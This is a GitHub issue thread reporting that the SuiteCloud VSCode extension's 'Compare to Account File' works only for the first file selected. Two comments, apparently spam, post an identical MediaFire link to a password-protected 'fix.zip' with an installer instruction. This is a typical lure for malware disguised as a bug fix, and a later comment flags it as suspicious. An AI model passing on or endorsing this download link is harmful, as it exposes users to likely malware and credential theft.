### ISSUE TITLE
Compare to Account File works only on first file

### ISSUE THREAD

**Issue by Elroban85** [oracle/netsuite-suitecloud-sdk#840]
### Select the SuiteCloud tool where you encountered the issue

SuiteCloud Extension for VSCode

### Version of the SuiteCloud Tool

2.0.0

### Operating system

Windows 11 23H2

### Node Version / VSCode Version

v18.20.3

### JAVA Version

java 17.0.5+9-LTS-191

### Bug description

Months ago this function was working as expected but since quite some time it seems to be broken.
Whenever you try to compare a file to the account, only the first comparison is working like it should. All others will be compared against the first selected local file until you reload VS Code.

### Steps To Reproduce

1. You select a file in the cabinet and choose 'Compare to Account File'
2. You get a diff view comparing the account and local file, so far so good
3. You select a new file in the cabinet and choose 'Compare to Account File'
4. Incorrect diff view pops up comparing account file to the file from step 1.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by antoniofruci** [comment]
This issue contains a suspicious file.
